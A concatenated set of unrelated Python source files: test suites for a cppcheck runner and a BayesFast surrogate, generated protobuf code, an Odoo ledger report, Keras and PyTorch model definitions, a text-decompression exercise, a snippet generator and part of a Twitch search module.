        metadata=Metadata(
            generator=Generator(
                name='cppcheck'
            ),
            sut=None,
            file_=None,
            stats=None),
        results=[]
    )

    @mock.patch('debile.slave.runners.cppcheck.run_command',
                return_value=('Cppcheck 1.69', '', 0))
    def test_cppcheck_version(self, mock_run):
        name, ver = version()
        self.assertEqual(name, 'Cppcheck')
        self.assertEqual(ver, '1.69')

    @mock.patch('debile.slave.runners.cppcheck.run_command',
                return_value=('Cppcheck 1.69', '', 1))
    def test_cppcheck_version_with_error(self, mock_run):
        # A non-zero exit status from run_command must surface as an exception.
        self.assertRaises(Exception, version)

    def test_cppcheck(self):
        cpp_analysis = cppcheck(self.file_path, self.firehose_results)
        xml_content = cpp_analysis[1]
        tree = lxml.etree.fromstring(xml_content.encode('utf-16'))
        i = 0
        paths = []
        lines = []
        severity = []
        messages = []
        testid = []
        for result in tree.xpath("//results/error"):
            paths.append(result.attrib['file'])
            lines.append(result.attrib['line'])
            severity.append(result.attrib['severity'])
            messages.append(result.attrib['msg'])
            testid.append(result.attrib['id'])
            i += 1
        # It think it is safe to say that this number won't be less than 4
        self.assertTrue(i > 4)
        # Check that some values exist (the order might change)
        self.assertTrue("src/lib_json/json_value.cpp" in paths)
        self.assertTrue("style" in severity)
        self.assertTrue("704" in lines)
        self.assertTrue("toomanyconfigs" in testid)

    @mock.patch('debile.slave.runners.cppcheck.run_command',
                return_value=('', ' ', 0))
    def test_cppcheck_with_withespace_in_stderr(self, mock_run):
        # Whitespace-only stderr must not be treated as a failure.
        cpp_analysis = cppcheck(self.file_path, self.firehose_results)
        self.assertEqual(cpp_analysis[0], self.firehose_results)
        self.assertEqual(cpp_analysis[1], ' ')
        self.assertFalse(cpp_analysis[2])
        self.assertIsNone(cpp_analysis[3])
        self.assertIsNone(cpp_analysis[4])

    def test_cppcheck_wrappers(self):
        cpp_analysis = cppcheck(self.file_path, self.firehose_results)
        issues = parse_cppcheck(cpp_analysis[1])
        i = 0
        found = None  # defensively initialised; the assertions require a match anyway
        for issue in issues:
            if issue.testid == "toomanyconfigs":
                found = issue
            i += 1
        self.assertEqual(found.testid, "toomanyconfigs")
        self.assertEqual(found.location.file.givenpath,
                         "src/lib_json/json_value.cpp")
        self.assertEqual(found.location.point.line, 0)
        self.assertEqual(found.location.point.column, 0)
        self.assertEqual(found.severity, "style")
        self.assertIsNone(found.notes)
        self.assertIsNone(found.customfields)
        self.assertTrue(i > 4)
|
from .ipn_hand import IPN
from .temporal_transform import *
from .target_transform import *
from .utils import get_dataset_root
# Per-channel mean/std — these are the standard ImageNet statistics,
# presumably used to normalise network inputs (confirm against the callers).
INPUT_MEAN = (0.485, 0.456, 0.406)
INPUT_STD = (0.229, 0.224, 0.225)
# Dataset root resolved once at import time by the project helper.
IPN_HAND_ROOT = get_dataset_root()
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: user_config.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='user_config.proto',
package='googleapis.artman',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x11user_config.proto\x12\x11googleapis.artman\"l\n\nUserConfig\x12-\n\x05local\x18\x01 \x01(\x0b\x32\x1e.googleapis.artman.LocalConfig\x12/\n\x06github\x18\x02 \x01(\x0b\x32\x1f.googleapis.artman.GitHubConfig\"\x1e\n\x0bLocalConfig\x12\x0f\n\x07toolkit\x18\x01 \x01(\t\"/\n\x0cGitHubConfig\x12\x10\n\x08username\x18\x01 \x01(\t\x12\r\n\x05token\x18\x02 \x01(\tb\x06proto3')
)
_USERCONFIG = _descriptor.Descriptor(
name='UserConfig',
full_name='googleapis.artman.UserConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='local', full_name='googleapis.artman.UserConfig.local', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='github', full_name='googleapis.artman.UserConfig.github', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=40,
serialized_end=148,
)
_LOCALCONFIG = _descriptor.Descriptor(
name='LocalConfig',
full_name='googleapis.artman.LocalConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='toolkit', full_name='googleapis.artman.LocalConfig.toolkit', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=150,
serialized_end=180,
)
_GITHUBCONFIG = _descriptor.Descriptor(
name='GitHubConfig',
full_name='googleapis.artman.GitHubConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='username', full_name='googleapis.artman.GitHubConfig.username', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='token', full_name='googleapis.artman.GitHubConfig.token', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=182,
serialized_end=229,
)
_USERCONFIG.fields_by_name['local'].message_type = _LOCALCONFIG
_USERCONFIG.fields_by_name['github'].message_type = _GITHUBCONFIG
DESCRIPTOR.message_types_by_name['UserConfig'] = _USERCONFIG
DESCRIPTOR.message_types_by_name['LocalConfig'] = _LOCALCONFIG
DESCRIPTOR.message_types_by_name['GitHubConfig'] = _GITHUBCONFIG
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
UserConfig = _reflection.GeneratedProtocolMessageType('UserConfig', (_message.Message,), dict(
DESCRIPTOR = _USERCONFIG,
__module__ = 'user_config_pb2'
# @@protoc_insertion_point(class_scope:googleapis.artman.UserConfig)
))
_sym_db.RegisterMessage(UserConfig)
LocalConfig = _reflection.GeneratedProtocolMessageType('LocalConfig', (_message.Message,), dict(
DESCRIPTOR = _LOCALCONFIG,
__module__ = 'user_config_pb2'
# @@protoc_insertion_point(class_scope:googleapis.artman.LocalConfig)
))
_sym_db.RegisterMessage(LocalConfig)
GitHubConfig = _reflection.GeneratedProtocolMessageType('GitHubConfig', (_message.Message,), dict(
DESCRIPTOR = _GITHUBCONFIG,
__module__ = 'user_config_pb2'
# @@protoc_insertion_point(class_scope:googleapis.artman.GitHubConfig)
))
_sym_db.RegisterMessage(GitHubConfig)
# @@protoc_insertion_point(module_scope)
|
# -*- coding: utf-8 -*-
import time
from odoo import api, models, _
from odoo.exceptions import UserError
class ReportGeneralLedger(models.AbstractModel):
    """Data provider for the General Ledger PDF report (rendered via QWeb)."""
    _name = 'report.accounting_pdf_reports.report_generalledger'

    def _get_account_move_entry(self, accounts, init_balance, sortby, display_account):
        """
        :param:
                accounts: the recordset of accounts
                init_balance: boolean value of initial_balance
                sortby: sorting by date or partner and journal
                display_account: type of account(receivable, payable and both)

        Returns a dictionary of accounts with following key and value {
                'code': account code,
                'name': account name,
                'debit': sum of total debit amount,
                'credit': sum of total credit amount,
                'balance': total balance,
                'amount_currency': sum of amount_currency,
                'move_lines': list of move line
        }
        """
        cr = self.env.cr
        MoveLine = self.env['account.move.line']
        # One bucket of move lines per requested account id.
        move_lines = {x: [] for x in accounts.ids}
        # Prepare initial sql query and Get the initial move lines
        if init_balance:
            # initial_bal=True makes _query_get build the "everything before
            # date_from" domain, used to synthesize one 'Initial Balance' row
            # per account.
            init_tables, init_where_clause, init_where_params = MoveLine.with_context(date_from=self.env.context.get('date_from'), date_to=False, initial_bal=True)._query_get()
            init_wheres = [""]
            if init_where_clause.strip():
                init_wheres.append(init_where_clause.strip())
            init_filters = " AND ".join(init_wheres)
            # _query_get emits ORM table aliases; rewrite them to match the
            # manual aliases used in the SQL below (m = move, l = move line).
            filters = init_filters.replace('account_move_line__move_id', 'm').replace('account_move_line', 'l')
            sql = ("""SELECT 0 AS lid, l.account_id AS account_id, '' AS ldate, '' AS lcode, 0.0 AS amount_currency, '' AS lref, 'Initial Balance' AS lname, COALESCE(SUM(l.debit),0.0) AS debit, COALESCE(SUM(l.credit),0.0) AS credit, COALESCE(SUM(l.debit),0) - COALESCE(SUM(l.credit), 0) as balance, '' AS lpartner_id,\
                '' AS move_name, '' AS mmove_id, '' AS currency_code,\
                NULL AS currency_id,\
                '' AS invoice_id, '' AS invoice_type, '' AS invoice_number,\
                '' AS partner_name\
                FROM account_move_line l\
                LEFT JOIN account_move m ON (l.move_id=m.id)\
                LEFT JOIN res_currency c ON (l.currency_id=c.id)\
                LEFT JOIN res_partner p ON (l.partner_id=p.id)\
                LEFT JOIN account_invoice i ON (m.id =i.move_id)\
                JOIN account_journal j ON (l.journal_id=j.id)\
                WHERE l.account_id IN %s""" + filters + ' GROUP BY l.account_id')
            params = (tuple(accounts.ids),) + tuple(init_where_params)
            cr.execute(sql, params)
            for row in cr.dictfetchall():
                move_lines[row.pop('account_id')].append(row)
        sql_sort = 'l.date, l.move_id'
        if sortby == 'sort_journal_partner':
            sql_sort = 'j.code, p.name, l.move_id'
        # Prepare sql query base on selected parameters from wizard
        tables, where_clause, where_params = MoveLine._query_get()
        wheres = [""]
        if where_clause.strip():
            wheres.append(where_clause.strip())
        filters = " AND ".join(wheres)
        filters = filters.replace('account_move_line__move_id', 'm').replace('account_move_line', 'l')
        # Get move lines base on sql query and Calculate the total balance of move lines
        sql = ('''SELECT l.id AS lid, l.account_id AS account_id, l.date AS ldate, j.code AS lcode, l.currency_id, l.amount_currency, l.ref AS lref, l.name AS lname, COALESCE(l.debit,0) AS debit, COALESCE(l.credit,0) AS credit, COALESCE(SUM(l.debit),0) - COALESCE(SUM(l.credit), 0) AS balance,\
            m.name AS move_name, c.symbol AS currency_code, p.name AS partner_name\
            FROM account_move_line l\
            JOIN account_move m ON (l.move_id=m.id)\
            LEFT JOIN res_currency c ON (l.currency_id=c.id)\
            LEFT JOIN res_partner p ON (l.partner_id=p.id)\
            JOIN account_journal j ON (l.journal_id=j.id)\
            JOIN account_account acc ON (l.account_id = acc.id) \
            WHERE l.account_id IN %s ''' + filters + ''' GROUP BY l.id, l.account_id, l.date, j.code, l.currency_id, l.amount_currency, l.ref, l.name, m.name, c.symbol, p.name ORDER BY ''' + sql_sort)
        params = (tuple(accounts.ids),) + tuple(where_params)
        cr.execute(sql, params)
        for row in cr.dictfetchall():
            # Running balance: add the net of all lines already collected for
            # this account (including the synthetic initial-balance row).
            balance = 0
            for line in move_lines.get(row['account_id']):
                balance += line['debit'] - line['credit']
            row['balance'] += balance
            move_lines[row.pop('account_id')].append(row)
        # Calculate the debit, credit and balance for Accounts
        account_res = []
        for account in accounts:
            currency = account.currency_id and account.currency_id or account.company_id.currency_id
            res = dict((fn, 0.0) for fn in ['credit', 'debit', 'balance'])
            res['code'] = account.code
            res['name'] = account.name
            res['move_lines'] = move_lines[account.id]
            for line in res.get('move_lines'):
                res['debit'] += line['debit']
                res['credit'] += line['credit']
                # Lines carry a running balance, so the last one is the total.
                res['balance'] = line['balance']
            if display_account == 'all':
                account_res.append(res)
            if display_account == 'movement' and res.get('move_lines'):
                account_res.append(res)
            if display_account == 'not_zero' and not currency.is_zero(res['balance']):
                account_res.append(res)
        return account_res

    @api.model
    def _get_report_values(self, docids, data=None):
        """Assemble the rendering context for the QWeb template.

        Raises UserError when launched without the wizard's form payload.
        """
        if not data.get('form') or not self.env.context.get('active_model'):
            raise UserError(_("Form content is missing, this report cannot be printed."))
        self.model = self.env.context.get('active_model')
        docs = self.env[self.model].browse(self.env.context.get('active_ids', []))
        init_balance = data['form'].get('initial_balance', True)
        sortby = data['form'].get('sortby', 'sort_date')
        display_account = data['form']['display_account']
        codes = []
        if data['form'].get('journal_ids', False):
            codes = [journal.code for journal in self.env['account.journal'].search([('id', 'in', data['form']['journal_ids'])])]
        # Report either the selected accounts or every account in the chart.
        accounts = docs if self.model == 'account.account' else self.env['account.account'].search([])
        accounts_res = self.with_context(data['form'].get('used_context',{}))._get_account_move_entry(accounts, init_balance, sortby, display_account)
        return {
            'doc_ids': docids,
            'doc_model': self.model,
            'data': data['form'],
            'docs': docs,
            'time': time,
            'Accounts': accounts_res,
            'print_journal': codes,
        }
|
import os
import logging
from keras.layers import Dense, Input, MaxPooling2D
from keras.layers import Conv2D, Flatten, Lambda, Dropout
from keras.layers import Reshape, Conv2DTranspose
from keras.models import Model
from keras.losses import mse
from keras.utils import plot_model
from keras import backend as K
from datetime import datetime
# import argparse
# parser = argparse.ArgumentParser()
# parser.add_argument("-ld", "--latent_dim", type=int)
# parser.add_argument("-f", "--filters", type=int)
# parser.add_argument("-k", "--kernel", type=int)
# parser.add_argument("-ad", "--above_dense", type=int)
# args = parser.parse_args()
# latent_dim = args.latent_dim
# filters = args.filters
# kernel_size = args.kernel
# above_dense = args.above_dense
# Silence TensorFlow's verbose logger before any models are constructed.
logging.getLogger('tensorflow').disabled = True
class ModelController:
    """Builds the encoder and decoder halves of a convolutional VAE."""

    def __init__(self, latent_dim, filters, kernel_size, above_dense):
        # latent_dim: size of the latent code z.
        # filters: base conv filter count (mutated by the builder methods below).
        # kernel_size: square conv kernel edge length.
        # above_dense: width of the dense layer feeding the latent projections.
        self.latent_dim = latent_dim
        self.filters = filters
        self.kernel_size = kernel_size
        self.above_dense = above_dense

    def sampling(self, args):
        """Reparameterization trick: z = mean + exp(log_sigma) * eps, eps ~ N(0, 1).

        NOTE(review): the second tensor is exponentiated directly, i.e. it is
        treated as log(sigma) rather than log(variance) — confirm this matches
        the KL term in the training loss.
        """
        z_mean, z_log_sigma = args
        batch = K.shape(z_mean)[0]
        epsilon = K.random_normal(shape=(batch, self.latent_dim),
                                  mean=0., stddev=1.)
        return z_mean + K.exp(z_log_sigma) * epsilon

    def encoder_model(self, input_shape):
        # build encoder model
        # input_shape = x_train.shape[1:]
        inputs = Input(shape=input_shape, name='encoder_input')
        x = inputs
        # Two conv+pool stages; each iteration doubles self.filters.
        # NOTE(review): self.filters is mutated here and halved back in
        # decoder_model — calling either builder twice changes layer widths.
        for i in range(2):
            self.filters *= 2
            x = Conv2D(filters=self.filters,
                       kernel_size=self.kernel_size,
                       activation='relu',
                       padding='same')(x)
            x = MaxPooling2D(pool_size=(2, 2))(x)
            # x = Dropout(.2)
        # shape info needed to build decoder model
        shape = K.int_shape(x)
        x = Flatten()(x)
        x = Dense(self.above_dense, activation='relu')(x)
        z_mean = Dense(self.latent_dim, name='z_mean')(x)
        z_log_var = Dense(self.latent_dim, name='z_log_var')(x)
        z = Lambda(self.sampling)([z_mean, z_log_var])
        # instantiate encoder model
        # encoder = Model(inputs, [z_mean, z_log_var, z], name='encoder')
        encoder = Model(inputs, z, name='encoder')
        # Save an architecture diagram named after day + time + role.
        now = datetime.now()
        model_name = str(now.day) + str(now.strftime("%X")) + 'enc'
        if not os.path.exists('model'):
            os.mkdir('model')
        plot_model(encoder, to_file='model/{}.png'.format(model_name), show_shapes=True)
        # print(encoder.summary())
        # print("---------------------------"*10)
        return inputs, shape, encoder, z_mean, z_log_var

    def decoder_model(self, shape):
        """Build the decoder; *shape* is the encoder's conv feature-map shape."""
        latent_inputs = Input(shape=(self.latent_dim,), name='z_sampling')
        x = Dense(shape[1] * shape[2] * shape[3], activation='relu')(latent_inputs)
        x = Reshape((shape[1], shape[2], shape[3]))(x)
        print("x shape", x.shape)
        # Two stride-2 transposed-conv stages mirroring the encoder;
        # halves self.filters back to its pre-encoder value.
        for i in range(2):
            x = Conv2DTranspose(filters=self.filters,
                                kernel_size=self.kernel_size,
                                activation='relu',
                                strides=2,
                                padding='same')(x)
            self.filters //= 2
        outputs = Conv2DTranspose(filters=1,
                                  kernel_size=self.kernel_size,
                                  activation='sigmoid',
                                  padding='same',
                                  name='decoder_output')(x)
        # instantiate decoder model
        decoder = Model(latent_inputs, outputs, name='decoder')
        now = datetime.now()
        model_name = str(now.day) + str(now.strftime("%X")) + 'dec'
        # print(decoder.summary())
        # print("----------------------------"*10)
        plot_model(decoder, to_file='model/{}.png'.format(model_name), show_shapes=True)
        return decoder
if __name__ == '__main__':
    # Smoke test: assemble a full VAE from the encoder/decoder builders.
    kernel_size = 3
    filters = 64
    latent_dim = 128
    epochs = 4  # kept for parity with the training scripts; unused here
    above_dense = 512
    modelobj = ModelController(latent_dim, filters, kernel_size, above_dense)
    input_shape = (256, 344, 1)
    inputs, shape, encoder, z_mean, z_log_var = modelobj.encoder_model(input_shape)
    decoder = modelobj.decoder_model(shape)
    # Bug fix: the original read "outputs = outputs = decoder(...)" — a
    # duplicated assignment target with no effect; one binding suffices.
    outputs = decoder(encoder(inputs))
    vae = Model(inputs, outputs, name='vae')
    vae.summary()
|
import numpy as np
import bayesfast as bf
import numdifftools as nd
# Seed BayesFast's global generator so the test data is reproducible,
# then draw 50 sample points in R^4 used by the fit below.
bf.utils.random.set_generator(0)
rng = bf.utils.random.get_generator()
x = rng.normal(size=(50, 4))
def poly_f(x):
    """Evaluate a fixed cubic polynomial on the last axis of *x*.

    *x* has shape (..., 4); the result has shape (..., 1), i.e. the
    scalar value with a trailing singleton output axis appended.
    """
    a, b, c, d = x[..., 0], x[..., 1], x[..., 2], x[..., 3]
    value = (
        a**3 - 2 * b**3 + 3 * b * c * d
        - 4 * c**2 * d + 5 * a**2
        - 6 * a * c + 7 * b - 8
    )
    return value[..., np.newaxis]
def test_poly():
    """A 'cubic-3' PolyModel must reproduce poly_f exactly (poly_f is cubic)."""
    s = bf.modules.PolyModel('cubic-3', input_size=4, output_size=1)
    y = poly_f(x)
    s.fit(x, y)
    # Values: evaluate the fitted surrogate point-by-point against the truth.
    y_s = np.concatenate([s(x_i) for x_i in x])
    assert np.isclose(y_s, y).all()
    # Gradient: compare the surrogate's jacobian with a numerical gradient.
    j = nd.Gradient(lambda x: poly_f(x).flatten())(x[0])[np.newaxis]
    j_s = s.jac(x[0])[0]
    assert np.isclose(j_s, j).all()
|
from typing import Sequence
from maru.feature.extractor.abstract import IFeatureExtractor
from maru.types import FeatureVector, Word
class SuffixExtractor(IFeatureExtractor):
    """Emits word-suffix features for a configurable set of suffix lengths."""

    def __init__(self, sizes: Sequence[int] = range(1, 4)):
        # Ascending order lets extract() stop as soon as a suffix would
        # cover the entire word.
        self._sizes = sorted(sizes)

    def extract(self, word: Word) -> FeatureVector:
        """Yield ('suffix:<tail>', 1) pairs; the full word is never emitted."""
        for length in self._sizes:
            tail = word[-length:]
            if tail == word:
                break
            yield (f'suffix:{tail}', 1)
|
import torch.nn as nn
import torch.nn.functional as F
from base import BaseModel
class MnistModel(BaseModel):
    """LeNet-style CNN for single-channel 28x28 MNIST digit classification.

    Attribute names are kept stable so saved state_dicts remain loadable.
    """

    def __init__(self, num_classes=10):
        super().__init__()
        # Two conv blocks followed by a two-layer classifier head.
        self.conv1 = nn.Conv2d(1, 10, kernel_size=5)
        self.conv2 = nn.Conv2d(10, 20, kernel_size=5)
        self.conv2_drop = nn.Dropout2d()
        self.fc1 = nn.Linear(320, 50)
        self.fc2 = nn.Linear(50, num_classes)

    def forward(self, x):
        """Return per-class log-probabilities, shape (batch, num_classes)."""
        out = F.relu(F.max_pool2d(self.conv1(x), 2))
        out = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(out)), 2))
        out = out.view(-1, 320)  # flatten conv features to (batch, 320)
        out = F.relu(self.fc1(out))
        out = F.dropout(out, training=self.training)
        return F.log_softmax(self.fc2(out), dim=1)
class MitbihModel(BaseModel):
    """1-D CNN for 5-class MIT-BIH heartbeat classification.

    Attribute names are kept stable so saved state_dicts remain loadable.
    """

    def __init__(self, num_classes=5):
        super().__init__()
        # Four conv stages widening channels 1 -> 4 -> 16 -> 32 -> 64.
        self.conv1 = nn.Conv1d(1, 4, kernel_size=3)
        self.conv2 = nn.Conv1d(4, 16, kernel_size=3)
        self.conv3 = nn.Conv1d(16, 32, kernel_size=3)
        self.conv4 = nn.Conv1d(32, 64, kernel_size=3)
        self.conv4_drop = nn.Dropout()
        self.fc1 = nn.Linear(512, 128)
        self.fc2 = nn.Linear(128, num_classes)

    def forward(self, x):
        """Return per-class log-probabilities, shape (batch, num_classes)."""
        out = F.relu(F.max_pool1d(self.conv1(x), 3))
        out = F.relu(F.max_pool1d(self.conv2(out), 3))
        out = F.relu(F.avg_pool1d(self.conv3(out), 3))
        out = F.relu(self.conv4_drop(self.conv4(out)))
        out = out.view(-1, 512)  # flatten conv features to (batch, 512)
        out = F.relu(self.fc1(out))
        out = F.dropout(out, training=self.training)
        return F.log_softmax(self.fc2(out), dim=1)
# -*- coding: utf-8 -*-
'''A module to run the development server.'''
from wordfusion import app
# Start Flask's built-in development server with the interactive debugger.
# NOTE(review): debug=True is for local development only — never production.
app.run(debug=True)
|
"""
[5/12/2014] Challenge #162 [Easy] Novel Compression, pt. 1: Unpacking the Data
https://www.reddit.com/r/dailyprogrammer/comments/25clki/5122014_challenge_162_easy_novel_compression_pt_1/
# [](#EasyIcon) _(Easy)_: Novel Compression, pt. 1: Unpacking the Data
Welcome to this week's Theme Week. We're going to be creating our very own basic compression format for short novels or
writing. This format will probably not be practical for actual use, but may serve as a rudimentary introduction to how
data compression works. As a side task, it is advised to use structured programming techniques, so your program is easy
to extend, modify and maintain later on (ie. later this week.) To keep in line with our Easy-Intermediate-Hard trend,
our first step will be to write the **decompresser**.
The basic idea of this compression scheme will be the dictionary system. Words used in the data will be put into a
dictionary, so instead of repeating phrases over and over again, you can just repeat a number instead, thus saving
space. Also, because this system is based around written text, it will be specifically designed to handle sentences and
punctuation, and will not be geared to handle binary data.
# Formal Inputs and Outputs
## Input Description
The first section of the input we are going to receive will be the dictionary. This dictionary is just a list of words
present in the text we're decompressing. The first line of input will be a number **N** representing how many entries
the dictionary has. Following from that will be a list of **N** words, on separate lines. This will be our simple
dictionary. After this will be the data.
## Data Format
The pre-compressed data will be split up into human-readable 'chunks', representing one little segment of the output.
In a practical compression system, they will be represented by a few bytes rather than text, but doing it this way
makes it easier to write. Our chunks will follow 7 simple rules:
* If the chunk is just a number (eg. `37`), word number 37 from the dictionary (zero-indexed, so 0 is the 1st word) is
printed **lower-case**.
* If the chunk is a number followed by a caret (eg. `37^`), then word 37 from the dictionary will be printed
lower-case, **with the first letter capitalised**.
* If the chunk is a number followed by an exclamation point (eg. `37!`), then word 37 from the dictionary will be
printed **upper-case**.
* If it's a hyphen (`-`), then instead of putting a space in-between the previous and next words, put a hyphen instead.
* If it's any of the following symbols: `. , ? ! ; :`, then put that symbol at the end of the previous outputted word.
* If it's a letter `R` (upper or lower), print a new line.
* If it's a letter `E` (upper or lower), the end of input has been reached.
Remember, this is just for basic text, so not all possible inputs can be compressed. Ignore any other whitespace, like
tabs or newlines, in the input.
**Note**: All words will be in the Latin alphabet.
## Example Data
Therefore, if our dictionary consists of the following:
is
my
hello
name
stan
And we are given the following chunks:
2! ! R 1^ 3 0 4^ . E
Then the output text is:
HELLO!
My name is Stan.
Words are always separated by spaces unless they're hyphenated.
## Output Description
Print the resultant decompressed data from your decompression algorithm, using the rules described above.
# Challenge
## Challenge Input
20
i
do
house
with
mouse
in
not
like
them
ham
a
anywhere
green
eggs
and
here
or
there
sam
am
0^ 1 6 7 8 5 10 2 . R
0^ 1 6 7 8 3 10 4 . R
0^ 1 6 7 8 15 16 17 . R
0^ 1 6 7 8 11 . R
0^ 1 6 7 12 13 14 9 . R
0^ 1 6 7 8 , 18^ - 0^ - 19 . R E
(Line breaks added in data for clarity and ease of testing.)
## Expected Challenge Output
I do not like them in a house.
I do not like them with a mouse.
I do not like them here or there.
I do not like them anywhere.
I do not like green eggs and ham.
I do not like them, Sam-I-am.
"""
def decompress(words, chunks):
    """Expand compressed *chunks* into text using the dictionary *words*.

    Chunk rules (see the module docstring): a bare index prints the word
    lower-case; a trailing '^' capitalises it; a trailing '!' upper-cases
    it; '-' hyphenates with the next word; one of '. , ? ! ; :' attaches
    to the previous word; 'R'/'r' starts a new line; 'E'/'e' ends input.
    """
    pieces = []
    separator = ''  # emitted before the next word: '', ' ' or '-'
    for chunk in chunks:
        token = chunk.strip()
        if not token:
            continue  # ignore stray whitespace-only chunks
        if token in ('E', 'e'):
            break
        if token in ('R', 'r'):
            pieces.append('\n')
            separator = ''  # a new line never starts with a space
        elif token == '-':
            separator = '-'
        elif token in '.,?!;:':
            # Punctuation glues onto the previous word; the pending
            # separator is kept for the word that follows.
            pieces.append(token)
        elif token.endswith('^'):
            pieces.append(separator + words[int(token[:-1])].lower().capitalize())
            separator = ' '
        elif token.endswith('!'):
            pieces.append(separator + words[int(token[:-1])].upper())
            separator = ' '
        else:
            pieces.append(separator + words[int(token)].lower())
            separator = ' '
    return ''.join(pieces)


def main():
    """Read the dictionary then the chunk stream from stdin; print the text.

    Implements the challenge spec from the module docstring (the original
    function was an empty stub).
    """
    import sys
    tokens = sys.stdin.read().split()
    count = int(tokens[0])
    words = tokens[1:1 + count]
    print(decompress(words, tokens[1 + count:]), end='')


if __name__ == "__main__":
    main()
|
import json

import toml

# Build a VS Code snippets file with one entry per snooty directive that
# documents an example.
snooty = toml.load("scripts/rstspec.toml")

snippets = {}
for name, spec in snooty["directive"].items():
    if "example" not in spec:
        continue
    # Don't build snippets for devhub-only directives - they're handled elsewhere
    if str(name).startswith("devhub:"):
        continue
    print("Working on {}\n\n".format(name))
    # Bug fix: the original assembled JSON by string formatting, which
    # produced an invalid file whenever an example or help text contained a
    # double quote or backslash. json.dump escapes everything correctly,
    # including the newlines that were previously escaped by hand.
    snippets[name] = {
        "prefix": name,
        "body": spec["example"],
        "description": spec.get("help", name),  # fall back to the directive name
    }

with open("./snippets/snooty.code-snippets", "w") as outfile:
    json.dump(snippets, outfile, indent="\t")
|
# Octave example:
# [W,s,v] = svd((repmat(sum(x.*x,1), size(x,1),1).*x)*x^1);
|
from model.group import Group
from random import randrange
import pytest
import random
import string
def random_string(prefix, maxlen):
    """Return *prefix* followed by a random tail of letters, digits and spaces.

    The tail length is drawn uniformly from [0, maxlen); the space character
    is over-weighted (x10) so generated values often contain blanks.
    """
    alphabet = string.ascii_letters + string.digits + " " * 10
    length = random.randrange(maxlen)
    return prefix + "".join(random.choice(alphabet) for _ in range(length))
# Two randomized Group fixtures; ids=repr(...) keeps pytest's output readable.
test_data = [
    Group(name=random_string("name", 10), header=random_string("header", 20), footer=random_string("footer", 20))
    for i in range(2)
]


@pytest.mark.parametrize("group", test_data, ids=[repr(x) for x in test_data])
def test_edit_name(app, db, group):
    """Edit a randomly chosen existing group; verify the DB reflects the edit."""
    # Precondition: at least one group must exist to edit.
    if len(db.get_group_list()) == 0:
        app.group.create(Group(name='new group name'))
    old_groups = db.get_group_list()
    editable_group = random.choice(old_groups)
    group.id = editable_group.id  # reuse the id so lists can be compared below
    app.group.edit_group_by_id(group, group.id)
    new_groups = db.get_group_list()
    assert len(old_groups) == len(new_groups)
    # Expected state: the old list with the edited group swapped in.
    old_groups.remove(editable_group)
    old_groups.append(group)
    assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
|
from .UrlParser import TwitchUrlParser
from .PlaylistAccessToken import TwitchPlaylist
from Core import GlobalExceptions
from Services.Utils.WorkerThreads import WorkerThread
from Services.Twitch.Gql import TwitchGqlAPI
from Services.Twitch.Playback import TwitchPlaybackAccessTokens
class Exceptions(GlobalExceptions.Exceptions):
    """Search-specific error types; the __str__ text is shown to the user."""
    class InvalidURL(Exception):
        def __str__(self):
            return "Invalid URL"
    class ChannelNotFound(Exception):
        def __str__(self):
            return "Channel Not Found"
    class VideoNotFound(Exception):
        def __str__(self):
            return "Video Not Found"
    class ClipNotFound(Exception):
        def __str__(self):
            return "Clip Not Found"
class Search:
    """Thin wrappers around the Twitch GQL / playback APIs that translate
    library-level failures into this module's Exceptions hierarchy."""
    API = TwitchGqlAPI.TwitchGqlAPI()

    @classmethod
    def Query(cls, mode, query):
        """Resolve a free-form query (channel / video / clip, or a URL).

        URL queries are parsed first; an unrecognized URL is tried as a
        direct playlist link before being rejected as InvalidURL.
        """
        if mode.isUrl():
            parseUrl = TwitchUrlParser(query)
            mode, query = parseUrl.type, parseUrl.data
            # Idiom fix: identity comparison with None ('== None' before).
            if mode is None:
                playlist = TwitchPlaylist(query)
                if playlist.found:
                    return playlist
                raise Exceptions.InvalidURL
        # Consistency fix: the original caught Exception and compared
        # type(e) == DataNotFound; use specific except clauses like the
        # Channel/ChannelVideos/ChannelClips helpers below already do.
        if mode.isChannel():
            try:
                return cls.API.getChannel(login=query)
            except TwitchGqlAPI.Exceptions.DataNotFound:
